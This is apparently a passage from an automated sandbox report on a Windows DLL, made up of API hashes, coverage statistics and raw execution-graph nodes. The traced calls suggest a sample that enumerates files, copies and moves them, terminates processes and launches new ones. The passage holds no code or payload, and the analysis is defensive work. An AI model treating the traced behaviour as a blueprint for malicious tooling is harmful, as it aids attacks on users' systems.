              • mydllmain.DLL1(00000FA0,-00000020,6F9F033F,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD61
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD71
              Strings
              • InitializeCriticalSectionEx, xrefs: 6F9EFD41
              Similarity
              • API ID: CountCriticalInitializeSectionSpinmydllmain
              • String ID: InitializeCriticalSectionEx
              • API String ID: 3077948437-3084827643
              APIs
              • mydllmain.DLL1(?,00000001,6F9E60D4,00000001,?,6F9EC1F7,?,?,?,?,?,00000000,6F9EAAAA,?,00000000,00000001), ref: 6F9EFD1C
              Similarity
              • API ID: mydllmain
              • String ID: FlsSetValue$ccs
              • API String ID: 979097349-2990521015
              Similarity
              • API ID: Allocmydllmain
              • String ID: FlsAlloc
              • API String ID: 2444374858-671089009
              • Opcode ID: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction ID: a7bd659a1ef523b56b66f01a8083a3fbed3ef9ff4d840c06664dea7a40f12a26
              • Opcode Fuzzy Hash: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction Fuzzy Hash: FBE0C23198692573CA322F54BD0899A7E19CFE1BBDB054023FF14953C19A20D81297E1

              Execution Graph

              Execution Coverage:2.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:2000
              Total number of Limit Nodes:33
              execution_graph: raw node/edge data of the interactive execution-graph view (node ids, addresses in the 6F9E0000 image, CRT-internal function labels and call edges), not reproduced here. Windows APIs named in the graph nodes: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, InitializeSListHead, InterlockedFlushSList, GetProcAddress, LoadLibraryExW, FreeLibrary, GetModuleHandleW, GetModuleHandleExW, GetLastError, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStdHandle, GetFileType, RtlAllocateHeap, HeapFree, GetCurrentProcess, TerminateProcess, ExitProcess.
13546 6f9ec628 13545->13546 13550 6f9ec38f __InternalCxxFrameHandler mydllmain 13545->13550 13547 6f9ec38f __InternalCxxFrameHandler mydllmain 13546->13547 13547->13542 13548->13544 13549->13545 13550->13546 13554 6f9f18e7 LeaveCriticalSection 13551->13554 13553 6f9ec57d 13553->13493 13553->13533 13554->13553 13558 6f9f1923 13555->13558 13557 6f9ec792 __InternalCxxFrameHandler 13557->13535 13559 6f9f1932 __InternalCxxFrameHandler 13558->13559 13560 6f9f193f 13559->13560 13562 6f9efbd3 13559->13562 13560->13557 13563 6f9efb4e __dosmaperr 5 API calls 13562->13563 13564 6f9efbef 13563->13564 13565 6f9efbf8 mydllmain 13564->13565 13566 6f9efc07 13564->13566 13565->13566 13566->13560 13569 6f9e4a3a 13567->13569 13570 6f9e305a 13567->13570 13568 6f9eb928 ___vcrt_freefls@4 17 API calls 13568->13569 13569->13568 13569->13570 13570->13465 13572 6f9ed04e 13571->13572 13573 6f9ed060 13571->13573 13575 6f9ed05c 13572->13575 13578 6f9f01a6 13572->13578 13581 6f9f2ef8 13573->13581 13575->13473 13585 6f9f0037 13578->13585 13583 6f9f2f06 13581->13583 13584 6f9ed06f 13581->13584 13582 6f9f2f0e mydllmain 13582->13583 13583->13582 13583->13584 13584->13473 13588 6f9eff8b 13585->13588 13589 6f9eff97 ___scrt_is_nonwritable_in_current_image 13588->13589 13596 6f9f189f EnterCriticalSection 13589->13596 13591 6f9f000d 13605 6f9f002b 13591->13605 13594 6f9effa1 ___scrt_uninitialize_crt 13594->13591 13597 6f9efeff 13594->13597 13596->13594 13598 6f9eff0b ___scrt_is_nonwritable_in_current_image 13597->13598 13608 6f9eafcd EnterCriticalSection 13598->13608 13600 6f9eff15 ___scrt_uninitialize_crt 13601 6f9eff4e 13600->13601 13609 6f9f0141 13600->13609 13622 6f9eff7f 13601->13622 13674 6f9f18e7 LeaveCriticalSection 13605->13674 13607 6f9f0019 13607->13575 13608->13600 13610 6f9f0156 __wsopen_s 13609->13610 13611 6f9f015d 13610->13611 13612 6f9f0168 13610->13612 13613 6f9f0037 ___scrt_uninitialize_crt 79 API calls 13611->13613 13625 6f9f00d8 13612->13625 13616 6f9f0163 13613->13616 13617 
6f9e609e __wsopen_s 50 API calls 13616->13617 13619 6f9f01a0 13617->13619 13619->13601 13620 6f9f0189 13638 6f9f5de5 13620->13638 13673 6f9eafe1 LeaveCriticalSection 13622->13673 13624 6f9eff6d 13624->13594 13626 6f9f0118 13625->13626 13627 6f9f00f1 13625->13627 13626->13616 13631 6f9ed222 13626->13631 13627->13626 13628 6f9ed222 __fread_nolock 50 API calls 13627->13628 13629 6f9f010d 13628->13629 13649 6f9f113f 13629->13649 13632 6f9ed22e 13631->13632 13633 6f9ed243 13631->13633 13634 6f9ee7b1 __dosmaperr 17 API calls 13632->13634 13633->13620 13635 6f9ed233 13634->13635 13636 6f9ec276 __wsopen_s 50 API calls 13635->13636 13637 6f9ed23e 13636->13637 13637->13620 13639 6f9f5df6 13638->13639 13642 6f9f5e03 13638->13642 13640 6f9ee7b1 __dosmaperr 17 API calls 13639->13640 13648 6f9f5dfb 13640->13648 13641 6f9f5e4c 13643 6f9ee7b1 __dosmaperr 17 API calls 13641->13643 13642->13641 13644 6f9f5e2a 13642->13644 13645 6f9f5e51 13643->13645 13660 6f9f5d43 13644->13660 13647 6f9ec276 __wsopen_s 50 API calls 13645->13647 13647->13648 13648->13616 13650 6f9f114b ___scrt_is_nonwritable_in_current_image 13649->13650 13651 6f9f118c 13650->13651 13653 6f9f11d2 13650->13653 13659 6f9f1153 13650->13659 13652 6f9ec1f9 __wsopen_s 33 API calls 13651->13652 13652->13659 13654 6f9f33e2 __wsopen_s EnterCriticalSection 13653->13654 13655 6f9f11d8 13654->13655 13656 6f9f11f6 13655->13656 13657 6f9f1250 __wsopen_s 73 API calls 13655->13657 13658 6f9f1248 __wsopen_s LeaveCriticalSection 13656->13658 13657->13656 13658->13659 13659->13626 13661 6f9f5d4f ___scrt_is_nonwritable_in_current_image 13660->13661 13662 6f9f33e2 __wsopen_s EnterCriticalSection 13661->13662 13663 6f9f5d5e 13662->13663 13664 6f9f365e __wsopen_s 50 API calls 13663->13664 13672 6f9f5da3 13663->13672 13666 6f9f5d8a FlushFileBuffers 13664->13666 13665 6f9ee7b1 __dosmaperr 17 API calls 13667 6f9f5daa 13665->13667 13666->13667 13668 6f9f5d96 GetLastError 13666->13668 13670 6f9f5dd9 ___scrt_uninitialize_crt LeaveCriticalSection 
13667->13670 13669 6f9ee79e __dosmaperr 17 API calls 13668->13669 13669->13672 13671 6f9f5dc2 13670->13671 13671->13648 13672->13665 13673->13624 13674->13607 13680 6f9ed073 13675->13680 13678 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 13679 6f9e30ba 13678->13679 13679->12875 13683 6f9edae8 13680->13683 13684 6f9e359c 13683->13684 13685 6f9edaf2 13683->13685 13684->13678 13687 6f9efc71 13685->13687 13688 6f9efb4e __dosmaperr 5 API calls 13687->13688 13689 6f9efc8d 13688->13689 13690 6f9efca8 TlsFree 13689->13690 13691 6f9efc96 mydllmain 13689->13691 13692 6f9efca3 13691->13692 13692->13684 13694 6f9e2983 __fread_nolock 13693->13694 13727 6f9e10ab 13694->13727 13696 6f9e299b __DllMainCRTStartup@12 _strlen 13730 6f9e1024 13696->13730 13699 6f9eb928 ___vcrt_freefls@4 17 API calls 13700 6f9e29e4 GetEnvironmentVariableW 13699->13700 13734 6f9e1274 13700->13734 13703 6f9e10ab __DllMainCRTStartup@12 59 API calls 13704 6f9e2a14 __DllMainCRTStartup@12 _strlen 13703->13704 13705 6f9e1024 __DllMainCRTStartup@12 58 API calls 13704->13705 13706 6f9e2a54 13705->13706 13707 6f9eb928 ___vcrt_freefls@4 17 API calls 13706->13707 13708 6f9e2a5a 13707->13708 13754 6f9e140f 13708->13754 13711 6f9e10ab __DllMainCRTStartup@12 59 API calls 13712 6f9e2a92 __DllMainCRTStartup@12 _strlen 13711->13712 13713 6f9e1024 __DllMainCRTStartup@12 58 API calls 13712->13713 13714 6f9e2adc 13713->13714 13715 6f9eb928 ___vcrt_freefls@4 17 API calls 13714->13715 13716 6f9e2ae2 13715->13716 13717 6f9e10ab __DllMainCRTStartup@12 59 API calls 13716->13717 13718 6f9e2af5 __DllMainCRTStartup@12 _strlen 13717->13718 13719 6f9e1024 __DllMainCRTStartup@12 58 API calls 13718->13719 13720 6f9e2b3d 13719->13720 13721 6f9eb928 ___vcrt_freefls@4 17 API calls 13720->13721 13722 6f9e2b43 13721->13722 13776 6f9e1629 13722->13776 13726 6f9e1012 ExitProcess 13815 6f9e107d 13727->13815 13731 6f9e103d __DllMainCRTStartup@12 13730->13731 13938 6f9eaabc 13731->13938 14119 6f9e44d0 13734->14119 13736 6f9e12a3 
GetModuleHandleW 13737 6f9e10ab __DllMainCRTStartup@12 59 API calls 13736->13737 13738 6f9e12c6 __DllMainCRTStartup@12 _strlen 13737->13738 13739 6f9e1308 GetProcAddress 13738->13739 13740 6f9eb928 ___vcrt_freefls@4 17 API calls 13739->13740 13741 6f9e1320 13740->13741 13742 6f9e10ab __DllMainCRTStartup@12 59 API calls 13741->13742 13743 6f9e1332 __DllMainCRTStartup@12 _strlen 13742->13743 13744 6f9e1374 GetProcAddress 13743->13744 13745 6f9eb928 ___vcrt_freefls@4 17 API calls 13744->13745 13746 6f9e138b 13745->13746 13747 6f9e10ab __DllMainCRTStartup@12 59 API calls 13746->13747 13748 6f9e139d __DllMainCRTStartup@12 _strlen 13747->13748 13749 6f9e13dd GetProcAddress 13748->13749 13750 6f9eb928 ___vcrt_freefls@4 17 API calls 13749->13750 13751 6f9e13f4 13750->13751 13752 6f9e2e45 _ValidateLocalCookies 5 API calls 13751->13752 13753 6f9e1407 13752->13753 13753->13703 13755 6f9e1439 __fread_nolock 13754->13755 13756 6f9e10ab __DllMainCRTStartup@12 59 API calls 13755->13756 13757 6f9e1485 __DllMainCRTStartup@12 _strlen 13756->13757 13758 6f9e1024 __DllMainCRTStartup@12 58 API calls 13757->13758 13759 6f9e14cd 13758->13759 13760 6f9eb928 ___vcrt_freefls@4 17 API calls 13759->13760 13761 6f9e14d6 13760->13761 13762 6f9e1024 __DllMainCRTStartup@12 58 API calls 13761->13762 13763 6f9e14f7 CreateProcessW 13762->13763 13764 6f9e160e 13763->13764 13767 6f9e1525 __fread_nolock 13763->13767 13765 6f9e2e45 _ValidateLocalCookies 5 API calls 13764->13765 13766 6f9e1622 Sleep Sleep 13765->13766 13766->13711 13768 6f9e10ab __DllMainCRTStartup@12 59 API calls 13767->13768 13769 6f9e156b __DllMainCRTStartup@12 _strlen 13768->13769 13770 6f9e1024 __DllMainCRTStartup@12 58 API calls 13769->13770 13771 6f9e15b3 13770->13771 13772 6f9eb928 ___vcrt_freefls@4 17 API calls 13771->13772 13773 6f9e15b9 13772->13773 13774 6f9e1024 __DllMainCRTStartup@12 58 API calls 13773->13774 13775 6f9e15e3 Sleep CreateProcessW 13774->13775 13775->13764 13777 6f9e1024 __DllMainCRTStartup@12 58 API calls 
13776->13777 13778 6f9e16ca FindFirstFileW 13777->13778 13786 6f9e16f2 13778->13786 13779 6f9e1a0d 14121 6f9e2469 13779->14121 13782 6f9e19e8 FindNextFileW 13782->13786 13783 6f9e1024 __DllMainCRTStartup@12 58 API calls 13783->13786 13784 6f9e2469 __DllMainCRTStartup@12 50 API calls 13785 6f9e1a23 13784->13785 13787 6f9e2e45 _ValidateLocalCookies 5 API calls 13785->13787 13786->13779 13786->13782 13786->13783 13788 6f9e1629 __DllMainCRTStartup@12 126 API calls 13786->13788 13795 6f9e1794 __DllMainCRTStartup@12 _strlen 13786->13795 13789 6f9e1a40 13787->13789 13788->13786 13808 6f9e2e45 13789->13808 13790 6f9e1024 __DllMainCRTStartup@12 58 API calls 13792 6f9e19af TerminateProcess CloseHandle CloseHandle 13790->13792 13791 6f9e10ab __DllMainCRTStartup@12 59 API calls 13791->13795 14208 6f9e1a48 13792->14208 13794 6f9e1024 __DllMainCRTStartup@12 58 API calls 13794->13795 13795->13790 13795->13791 13795->13794 13796 6f9eb928 ___vcrt_freefls@4 17 API calls 13795->13796 13797 6f9e17f2 ExpandEnvironmentStringsW 13796->13797 13798 6f9e1024 __DllMainCRTStartup@12 58 API calls 13797->13798 13802 6f9e1828 __fread_nolock __DllMainCRTStartup@12 13798->13802 13799 6f9e2469 50 API calls __DllMainCRTStartup@12 13799->13802 13800 6f9e23bb 52 API calls __DllMainCRTStartup@12 13800->13802 13802->13799 13802->13800 13804 6f9e1024 __DllMainCRTStartup@12 58 API calls 13802->13804 14125 6f9e23ec 13802->14125 14133 6f9e1cfa CoInitialize CoCreateInstance 13802->14133 13805 6f9e190a CopyFileW Sleep 13804->13805 14203 6f9eb8fb MoveFileExW 13805->14203 13807 6f9e1940 TerminateProcess CloseHandle CloseHandle 13807->13786 13809 6f9e2e4e IsProcessorFeaturePresent 13808->13809 13810 6f9e2e4d 13808->13810 13812 6f9e3289 13809->13812 13810->13726 14949 6f9e324c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13812->14949 13814 6f9e336c 13814->13726 13816 6f9e1094 __DllMainCRTStartup@12 13815->13816 13819 6f9eaa7b 13816->13819 13820 6f9eaa8f __wsopen_s 
13819->13820 13825 6f9e6891 13820->13825 13823 6f9e609e __wsopen_s 50 API calls 13824 6f9e109e 13823->13824 13824->13696 13826 6f9e689d 13825->13826 13827 6f9e68c0 13825->13827 13828 6f9ec1f9 __wsopen_s 33 API calls 13826->13828 13831 6f9e68e7 13827->13831 13833 6f9e659a 13827->13833 13832 6f9e68b8 13828->13832 13830 6f9ec1f9 __wsopen_s 33 API calls 13830->13832 13831->13830 13831->13832 13832->13823 13834 6f9e65e9 13833->13834 13835 6f9e65c6 13833->13835 13834->13835 13839 6f9e65f1 __DllMainCRTStartup@12 13834->13839 13836 6f9ec1f9 __wsopen_s 33 API calls 13835->13836 13837 6f9e65de 13836->13837 13838 6f9e2e45 _ValidateLocalCookies 5 API calls 13837->13838 13840 6f9e670c 13838->13840 13844 6f9e8a6b 13839->13844 13840->13831 13861 6f9ea71e 13844->13861 13846 6f9e6672 13858 6f9e847f 13846->13858 13847 6f9ec1f9 __wsopen_s 33 API calls 13847->13846 13848 6f9e8a90 13848->13847 13853 6f9e8a85 __DllMainCRTStartup@12 13853->13846 13853->13848 13854 6f9e8b94 13853->13854 13865 6f9ea670 13853->13865 13872 6f9e86c9 13853->13872 13875 6f9e90e8 13853->13875 13909 6f9e970d 13853->13909 13855 6f9ec1f9 __wsopen_s 33 API calls 13854->13855 13856 6f9e8bae 13855->13856 13857 6f9ec1f9 __wsopen_s 33 API calls 13856->13857 13857->13846 13859 6f9ee7c4 ___free_lconv_mon 17 API calls 13858->13859 13860 6f9e848f 13859->13860 13860->13837 13862 6f9ea742 13861->13862 13863 6f9ea729 13861->13863 13862->13853 13864 6f9ec1f9 __wsopen_s 33 API calls 13863->13864 13864->13862 13866 6f9e64e7 __wsopen_s 50 API calls 13865->13866 13867 6f9ea680 13866->13867 13868 6f9ee879 __wsopen_s 50 API calls 13867->13868 13869 6f9ea69d 13868->13869 13870 6f9ee8d7 __wsopen_s 50 API calls 13869->13870 13871 6f9ea6aa 13870->13871 13871->13853 13873 6f9e6bcc __DllMainCRTStartup@12 50 API calls 13872->13873 13874 6f9e8704 13873->13874 13874->13853 13876 6f9e90ef 13875->13876 13877 6f9e9106 13875->13877 13879 6f9e9792 13876->13879 13880 6f9e9732 13876->13880 13902 6f9e9145 13876->13902 13878 6f9ec1f9 __wsopen_s 33 API 
calls 13877->13878 13877->13902 13883 6f9e913a 13878->13883 13881 6f9e97cb 13879->13881 13882 6f9e9797 13879->13882 13884 6f9e97b8 13880->13884 13885 6f9e9738 13880->13885 13886 6f9e97e8 13881->13886 13887 6f9e97d0 13881->13887 13888 6f9e97c4 13882->13888 13892 6f9e9799 13882->13892 13883->13853 13894 6f9e76eb __DllMainCRTStartup@12 34 API calls 13884->13894 13893 6f9e973d 13885->13893 13896 6f9e9789 13885->13896 13890 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13886->13890 13887->13884 13887->13896 13907 6f9e9763 __DllMainCRTStartup@12 13887->13907 13889 6f9ea474 __DllMainCRTStartup@12 34 API calls 13888->13889 13889->13907 13890->13907 13891 6f9e974c 13895 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13891->13895 13908 6f9e97f1 __DllMainCRTStartup@12 13891->13908 13892->13891 13899 6f9e97a8 13892->13899 13893->13891 13897 6f9e9776 13893->13897 13893->13907 13894->13907 13895->13907 13898 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13896->13898 13896->13908 13900 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13897->13900 13897->13908 13898->13907 13899->13884 13901 6f9e97ac 13899->13901 13900->13907 13904 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13901->13904 13901->13908 13902->13853 13903 6f9e2e45 _ValidateLocalCookies 5 API calls 13905 6f9e9a6a 13903->13905 13904->13907 13905->13853 13906 6f9ef461 __DllMainCRTStartup@12 52 API calls 13906->13907 13907->13906 13907->13908 13908->13903 13910 6f9e9792 13909->13910 13911 6f9e9732 13909->13911 13912 6f9e97cb 13910->13912 13913 6f9e9797 13910->13913 13914 6f9e97b8 13911->13914 13915 6f9e9738 13911->13915 13916 6f9e97e8 13912->13916 13917 6f9e97d0 13912->13917 13918 6f9e9799 13913->13918 13919 6f9e97c4 13913->13919 13923 6f9e76eb __DllMainCRTStartup@12 34 API calls 13914->13923 13925 6f9e9789 13915->13925 13926 6f9e973d 13915->13926 13922 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13916->13922 13917->13914 13917->13925 13936 6f9e9763 __DllMainCRTStartup@12 13917->13936 13921 6f9e974c 13918->13921 13927 6f9e97a8 
13918->13927 13920 6f9ea474 __DllMainCRTStartup@12 34 API calls 13919->13920 13920->13936 13924 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13921->13924 13937 6f9e97f1 __DllMainCRTStartup@12 13921->13937 13922->13936 13923->13936 13924->13936 13929 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13925->13929 13925->13937 13926->13921 13928 6f9e9776 13926->13928 13926->13936 13927->13914 13930 6f9e97ac 13927->13930 13931 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13928->13931 13928->13937 13929->13936 13933 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13930->13933 13930->13937 13931->13936 13932 6f9e2e45 _ValidateLocalCookies 5 API calls 13934 6f9e9a6a 13932->13934 13933->13936 13934->13853 13935 6f9ef461 __DllMainCRTStartup@12 52 API calls 13935->13936 13936->13935 13936->13937 13937->13932 13939 6f9eaad0 __wsopen_s 13938->13939 13944 6f9e6930 13939->13944 13942 6f9e609e __wsopen_s 50 API calls 13943 6f9e1047 13942->13943 13943->13699 13945 6f9e695f 13944->13945 13946 6f9e693c 13944->13946 13947 6f9e6986 13945->13947 13952 6f9e670e 13945->13952 13948 6f9ec1f9 __wsopen_s 33 API calls 13946->13948 13950 6f9ec1f9 __wsopen_s 33 API calls 13947->13950 13951 6f9e6957 13947->13951 13948->13951 13950->13951 13951->13942 13953 6f9e675d 13952->13953 13954 6f9e673a 13952->13954 13953->13954 13957 6f9e6765 __DllMainCRTStartup@12 13953->13957 13955 6f9ec1f9 __wsopen_s 33 API calls 13954->13955 13961 6f9e6752 13955->13961 13956 6f9e2e45 _ValidateLocalCookies 5 API calls 13958 6f9e688f 13956->13958 13963 6f9e8d4f 13957->13963 13958->13947 13960 6f9e847f __DllMainCRTStartup@12 17 API calls 13960->13961 13961->13956 13964 6f9ea71e __DllMainCRTStartup@12 33 API calls 13963->13964 13967 6f9e8d64 __DllMainCRTStartup@12 13964->13967 13965 6f9e67e6 13965->13960 13966 6f9e8d6f 13968 6f9ec1f9 __wsopen_s 33 API calls 13966->13968 13967->13965 13967->13966 13972 6f9e8741 13967->13972 13975 6f9e9241 13967->13975 14016 6f9e9a6c 13967->14016 13968->13965 14052 6f9e6ddb 13972->14052 13974 
6f9e877e 13974->13967 13976 6f9e924f 13975->13976 13977 6f9e9267 13975->13977 13979 6f9e92a8 13976->13979 13980 6f9e9a9a 13976->13980 13981 6f9e9b04 13976->13981 13978 6f9ec1f9 __wsopen_s 33 API calls 13977->13978 13977->13979 13984 6f9e929c 13978->13984 13979->13967 13985 6f9e9b2c 13980->13985 13986 6f9e9aa0 13980->13986 13982 6f9e9b09 13981->13982 13983 6f9e9b43 13981->13983 13987 6f9e9b3a 13982->13987 13988 6f9e9b0b 13982->13988 13989 6f9e9b48 13983->13989 13990 6f9e9b62 13983->13990 13984->13967 14089 6f9e7878 13985->14089 13991 6f9e9aa5 13986->13991 13992 6f9e9ad1 13986->13992 14096 6f9ea491 13987->14096 13998 6f9e9ab3 13988->13998 14005 6f9e9b1a 13988->14005 13995 6f9e9b4d 13989->13995 13996 6f9e9b59 13989->13996 14104 6f9ea4c4 13990->14104 13991->13996 13999 6f9e9aab 13991->13999 13992->13999 14001 6f9e9af9 13992->14001 13995->13985 13995->14001 14100 6f9ea54c 13996->14100 14014 6f9e9b6d __DllMainCRTStartup@12 13998->14014 14062 6f9ea10b 13998->14062 13999->13998 14003 6f9e9ade 13999->14003 14011 6f9e9acc __DllMainCRTStartup@12 13999->14011 14001->14014 14078 6f9e7b97 14001->14078 14003->14014 14072 6f9ea347 14003->14072 14005->13985 14007 6f9e9b1e 14005->14007 14007->14014 14085 6f9ea3ef 14007->14085 14008 6f9e2e45 _ValidateLocalCookies 5 API calls 14009 6f9e9e5e 14008->14009 14009->13967 14012 6f9ea670 __wsopen_s 50 API calls 14011->14012 14011->14014 14015 6f9e9d4d 14011->14015 14012->14015 14014->14008 14015->14014 14107 6f9ef5cb 14015->14107 14017 6f9e9a9a 14016->14017 14018 6f9e9b04 14016->14018 14021 6f9e9b2c 14017->14021 14022 6f9e9aa0 14017->14022 14019 6f9e9b09 14018->14019 14020 6f9e9b43 14018->14020 14023 6f9e9b3a 14019->14023 14024 6f9e9b0b 14019->14024 14025 6f9e9b48 14020->14025 14026 6f9e9b62 14020->14026 14029 6f9e7878 __DllMainCRTStartup@12 34 API calls 14021->14029 14027 6f9e9aa5 14022->14027 14028 6f9e9ad1 14022->14028 14030 6f9ea491 __DllMainCRTStartup@12 34 API calls 14023->14030 14031 6f9e9ab3 14024->14031 14041 6f9e9b1a 14024->14041 
14032 6f9e9b4d 14025->14032 14033 6f9e9b59 14025->14033 14034 6f9ea4c4 __DllMainCRTStartup@12 34 API calls 14026->14034 14027->14033 14035 6f9e9aab 14027->14035 14028->14035 14037 6f9e9af9 14028->14037 14047 6f9e9acc __DllMainCRTStartup@12 14029->14047 14030->14047 14036 6f9ea10b __DllMainCRTStartup@12 57 API calls 14031->14036 14050 6f9e9b6d __DllMainCRTStartup@12 14031->14050 14032->14021 14032->14037 14038 6f9ea54c __DllMainCRTStartup@12 50 API calls 14033->14038 14034->14047 14035->14031 14039 6f9e9ade 14035->14039 14035->14047 14036->14047 14040 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14037->14040 14037->14050 14038->14047 14043 6f9ea347 __DllMainCRTStartup@12 51 API calls 14039->14043 14039->14050 14040->14047 14041->14021 14042 6f9e9b1e 14041->14042 14046 6f9ea3ef __DllMainCRTStartup@12 33 API calls 14042->14046 14042->14050 14043->14047 14044 6f9e2e45 _ValidateLocalCookies 5 API calls 14045 6f9e9e5e 14044->14045 14045->13967 14046->14047 14048 6f9ea670 __wsopen_s 50 API calls 14047->14048 14047->14050 14051 6f9e9d4d 14047->14051 14048->14051 14049 6f9ef5cb __wsopen_s 51 API calls 14049->14051 14050->14044 14051->14049 14051->14050 14053 6f9ea6cb __DllMainCRTStartup@12 50 API calls 14052->14053 14055 6f9e6df1 14053->14055 14054 6f9e6e06 14056 6f9ec1f9 __wsopen_s 33 API calls 14054->14056 14055->14054 14059 6f9e6e39 14055->14059 14061 6f9e6e21 __DllMainCRTStartup@12 14055->14061 14056->14061 14057 6f9e7138 14058 6f9ea63e __DllMainCRTStartup@12 50 API calls 14057->14058 14058->14061 14059->14057 14060 6f9ea63e __DllMainCRTStartup@12 50 API calls 14059->14060 14060->14057 14061->13974 14063 6f9ea12c 14062->14063 14064 6f9e69fb __DllMainCRTStartup@12 18 API calls 14063->14064 14065 6f9ea16e __DllMainCRTStartup@12 14064->14065 14066 6f9ef2e0 __DllMainCRTStartup@12 56 API calls 14065->14066 14067 6f9ea201 14066->14067 14068 6f9ea670 __wsopen_s 50 API calls 14067->14068 14069 6f9ea224 __DllMainCRTStartup@12 14067->14069 14068->14069 14070 6f9ea670 __wsopen_s 
50 API calls 14069->14070 14071 6f9ea260 __DllMainCRTStartup@12 14069->14071 14070->14071 14071->14011 14071->14071 14073 6f9ea374 __DllMainCRTStartup@12 14072->14073 14074 6f9ea390 14073->14074 14075 6f9ea670 __wsopen_s 50 API calls 14073->14075 14076 6f9ea3b1 14073->14076 14077 6f9ef5cb __wsopen_s 51 API calls 14074->14077 14075->14074 14076->14011 14077->14076 14079 6f9e7bac __DllMainCRTStartup@12 14078->14079 14080 6f9e7bce 14079->14080 14082 6f9e7bf5 14079->14082 14081 6f9ec1f9 __wsopen_s 33 API calls 14080->14081 14084 6f9e7beb __DllMainCRTStartup@12 14081->14084 14083 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14082->14083 14082->14084 14083->14084 14084->14011 14088 6f9ea405 __DllMainCRTStartup@12 14085->14088 14086 6f9ec1f9 __wsopen_s 33 API calls 14087 6f9ea426 14086->14087 14087->14011 14088->14086 14088->14087 14090 6f9e788d __DllMainCRTStartup@12 14089->14090 14091 6f9e78af 14090->14091 14093 6f9e78d6 14090->14093 14092 6f9ec1f9 __wsopen_s 33 API calls 14091->14092 14095 6f9e78cc __DllMainCRTStartup@12 14092->14095 14094 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14093->14094 14093->14095 14094->14095 14095->14011 14097 6f9ea49d 14096->14097 14098 6f9e7559 __DllMainCRTStartup@12 34 API calls 14097->14098 14099 6f9ea4ad 14098->14099 14099->14011 14101 6f9ea569 __DllMainCRTStartup@12 14100->14101 14102 6f9ea5c0 __DllMainCRTStartup@12 50 API calls 14101->14102 14103 6f9ea587 __DllMainCRTStartup@12 14101->14103 14102->14103 14103->14011 14105 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14104->14105 14106 6f9ea4d9 14105->14106 14106->14011 14108 6f9ef5df 14107->14108 14116 6f9ef5ef 14107->14116 14109 6f9ef614 14108->14109 14110 6f9ea670 __wsopen_s 50 API calls 14108->14110 14108->14116 14111 6f9ef648 14109->14111 14112 6f9ef625 14109->14112 14110->14109 14114 6f9ef6c4 14111->14114 14115 6f9ef670 14111->14115 14111->14116 14113 6f9f5b7c __wsopen_s 5 API calls 14112->14113 14113->14116 14117 6f9f2c0b __fread_nolock MultiByteToWideChar 14114->14117 
14115->14116 14118 6f9f2c0b __fread_nolock MultiByteToWideChar 14115->14118 14116->14015 14117->14116 14118->14116 14120 6f9e44e7 14119->14120 14120->13736 14120->14120 14122 6f9e1a18 14121->14122 14123 6f9e2472 14121->14123 14122->13784 14240 6f9e2529 14123->14240 14126 6f9e2411 14125->14126 14127 6f9e2463 14126->14127 14130 6f9e241e __DllMainCRTStartup@12 14126->14130 14271 6f9e119f 14127->14271 14132 6f9e2425 __fread_nolock 14130->14132 14250 6f9e2711 14130->14250 14132->13802 14134 6f9e1d7b 14133->14134 14135 6f9e1d63 14133->14135 14137 6f9e23ec __DllMainCRTStartup@12 52 API calls 14134->14137 14327 6f9e1053 14135->14327 14139 6f9e1d8a ExpandEnvironmentStringsW 14137->14139 14141 6f9e1dbe __DllMainCRTStartup@12 14139->14141 14140 6f9e2329 14142 6f9e2469 __DllMainCRTStartup@12 50 API calls 14140->14142 14331 6f9e248f 14141->14331 14143 6f9e2334 14142->14143 14145 6f9e2469 __DllMainCRTStartup@12 50 API calls 14143->14145 14147 6f9e233f 14145->14147 14146 6f9e1dcc VariantInit VariantInit VariantInit VariantInit 14148 6f9e1e4f VariantClear VariantClear VariantClear VariantClear 14146->14148 14149 6f9e2469 __DllMainCRTStartup@12 50 API calls 14147->14149 14150 6f9e1e8c 14148->14150 14151 6f9e1e77 14148->14151 14152 6f9e234a 14149->14152 14341 6f9e11aa 14150->14341 14155 6f9e1053 __DllMainCRTStartup@12 85 API calls 14151->14155 14154 6f9e2e45 _ValidateLocalCookies 5 API calls 14152->14154 14156 6f9e2367 14154->14156 14169 6f9e1e82 CoUninitialize 14155->14169 14156->13802 14158 6f9e1e9e 14350 6f9e1216 14158->14350 14160 6f9e2469 __DllMainCRTStartup@12 50 API calls 14160->14140 14161 6f9e1ecc 14161->14151 14162 6f9e1ed8 14161->14162 14163 6f9e1f0d 14162->14163 14164 6f9e1ef8 14162->14164 14166 6f9e1f21 14163->14166 14167 6f9e11aa __DllMainCRTStartup@12 54 API calls 14163->14167 14165 6f9e1053 __DllMainCRTStartup@12 85 API calls 14164->14165 14165->14169 14168 6f9e1053 __DllMainCRTStartup@12 85 API calls 14166->14168 14170 6f9e1f39 14167->14170 14168->14169 14202 
